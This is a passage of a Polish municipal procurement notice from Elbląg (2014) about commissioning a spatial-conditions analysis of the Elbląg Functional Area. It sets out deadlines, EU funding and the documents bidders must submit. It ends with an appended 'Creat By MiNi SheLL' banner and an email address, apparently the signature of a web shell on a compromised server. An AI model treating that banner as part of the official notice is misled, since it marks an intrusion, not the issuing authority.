c)wystąpienia okoliczności, których nie można było przewidzieć w momencie zawarcia umowy, a które mogą przyczynić się do niewykonania elementów przedmiotu zamówienia w terminach określonych w zamówieniu z przyczyn nie leżących po stronie Wykonawcy takich jak: wydłużenie terminów posiedzeń Komisji Urbanistyczno-Architektonicznej oraz konsultacji z zewnętrznymi instytucjami planowania przestrzennego lub w przypadku zmian w obowiązujących przepisach prawnych mogących mieć istotny wpływ na terminy realizacji elementów przedmiotu zamówienia.   
2)Ustawowej zmiany wysokości stawki VAT oraz związanej z tym zmiany kwot wynagrodzenia brutto, określonych w § 4 wzoru umowy.
3)Zmiany podstawowych przepisów prawnych obowiązujących i niezbędnych dla sporządzenia przedmiotu niniejszego zamówienia.
4)Zmiany danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby biura Wykonawcy.
5)Likwidacji lub rozwiązania firmy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu Departament Organizacji i Nadzoru Referat Zamówień Publicznych pokój 404 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2014 godzina 09:30, miejsce: Urząd Miejski w Elblągu Departament Organizacji i Nadzoru Referat Zamówień Publicznych pokój 403 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie jest realizowane w ramach projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego z Programu Operacyjnego Pomoc Techniczna na lata 2007-2013 w ramach Konkursu Dotacji na działania wspierające jednostki samorządu terytorialnego w zakresie planowania współpracy w ramach miejskich obszarów funkcjonalnych. 2. Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA data rozpoczęcia: data udzielenia zamówienia
data zakończenia: 31 marca 2015 r. w tym:1)Wersja robocza dokumentu analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego przedstawiona Zamawiającemu: do 45 dni od podpisania umowy 2)Wersja dokumentu analizy uwarunkowań przestrzennych  Elbląskiego Obszaru Funkcjonalnego uwzględniająca uwagi Zamawiającego: do 14 dni od daty przekazania uwag przez Zamawiającego 
3)Termin przeprowadzenia konsultacji społecznych dokumentu analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego: do 30 dni od otrzymania wersji uwzględniającej uwagi Zamawiającego 4)Ostateczny termin wykonania dokumentu analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego uwzględniającego wyniki konsultacji: nie później niż do 31 marca 2015 r. 3. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:a) Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale.b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).4. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ:a) Dowodami, o których mowa powyżej są:-poświadczenie,
-oświadczenie Wykonawcy-jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.b)Obowiązek wykazania przez Wykonawcę w wykazie dotyczy usług polegających na wykonaniu analizy uwarunkowań funkcjonalno-przestrzennych obszaru (tj. obszaru tworzonego przez co najmniej 4 gminy, w tym gminę miejską lub miasto na prawach powiatu) lub koncepcji przestrzennego zagospodarowania kraju lub planu zagospodarowania przestrzennego województwa lub studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy.c)	W przypadku, gdy podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonywane jest Gmina Miasto Elbląg, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej w pkt a).d)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁACZNIK NR 5 do SIWZ WYKAZ USŁUG.e)	Przedmiot wykazanych usług należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w sekcji III.3.2) ogłoszenia.f)Dowody, że usługi zostały wykonane należycie, należy złożyć tylko do wskazanych w wykazie usług, o których mowa w sekcji III.3.2) ogłoszenia.
g)Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości usług wykonanych należy przeliczyć wg średniego kursu NBP na dzień zakończenia wykonywania usług, podając datę i kurs. h) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnianie warunku określonego w sekcji III.3.2) ogłoszenia.i) Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5.Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.3. SIWZ:a) Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 6 do SIWZ - WYKAZ OSÓB.b) Dla osób wykazanych w WYKAZIE OSÓB należy:a. dla Kierownika projektu:-wykazać doświadczenie w kierowaniu realizacją co najmniej dwóch zakończonych usług polegających na opracowaniu studium uwarunkowań przestrzennych miasta, gminy lub obszaru funkcjonalnego,-wykazać spełnianie jednego z warunków Art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. 2012.647 j.t. z późn. zm.) b. dla Eksperta ekonomisty-analityka rynku:-wskazać rodzaj wykształcenia oraz tytuł zawodowy,
-opisać doświadczenie w przeprowadzaniu analiz ekonomicznych zasadności realizacji inwestycji liniowych lub wielkoobszarowych.c) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.d)Wykonawca, który polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
6. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.4. SIWZ:a)Treść oświadczenia znajduje się na ZAŁĄCZNIKU NR 6 do SIWZ-Wykaz osób.b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie Wykonawcy składają wspólnie. 7.Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:a)Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.8.Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.9.Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 3. SIWZ:a)Informację o przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ.b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.10. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.11. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.12. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń  wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia. 13. Warunki udziału, o których mowa w art. 22 ust. 1 ustawy oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego zamówienia.UWAGA:Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com